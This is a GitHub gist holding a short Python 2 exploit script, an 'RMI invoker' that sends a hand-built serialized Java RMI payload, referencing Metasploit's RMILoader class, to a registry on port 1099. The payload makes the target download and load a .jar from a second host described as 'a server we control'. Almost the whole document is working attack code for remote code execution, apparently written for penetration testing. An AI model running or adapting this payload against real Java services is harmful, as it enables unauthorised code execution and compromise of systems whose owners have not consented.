Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Quick and dirty RMI invoker
#!/usr/bin/python
"""
Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 08/10/2014 - v0.1
"""
import socket
import binascii
import struct
HOST = '10.10.0.1'
PORT = 1099
fileloc = "http://10.10.0.2/myfile.jar"
dlen = len(fileloc)
data = ["\x4a\x52\x4d\x49\x00\x02\x4b\x00\x00\x00\x00\x00\x00",
"\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
"\x00\xf6\xb6\x89\x8d\x8b\xf2\x86\x43\x75\x72\x00\x18\x5b\x4c\x6a",
"\x61\x76\x61\x2e\x72\x6d\x69\x2e\x73\x65\x72\x76\x65\x72\x2e\x4f",
"\x62\x6a\x49\x44\x3b\x87\x13\x00\xb8\xd0\x2c\x64\x7e\x02\x00\x00",
"\x70\x78\x70\x00\x00\x00\x00\x77\x08\x00\x00\x00\x00\x00\x00\x00",
"\x00\x73\x72\x00\x14\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e",
"\x52\x4d\x49\x4c\x6f\x61\x64\x65\x72\xa1\x65\x44\xba\x26\xf9\xc2",
"\xf4\x02\x00\x00\x74\x00",
#struct.pack("h%ds" % (len(fileloc),), len(fileloc), fileloc), #where to download from
"\x1e",struct.pack("%ds"%(len(fileloc),),fileloc),
"\x78\x70\x77\x01\x00\x0a"]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(''.join(data))
dp = s.recv(1024)
#print "Response from RMI server: %s"%repr(dp)
dp = s.recv(2024)
dp = s.recv(2024)
#print "Response from RMI server: %s"%repr(dp)
if "RMI class loader disabled" in dp:
print "[x] RMI class loader disabled.. No cigar"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.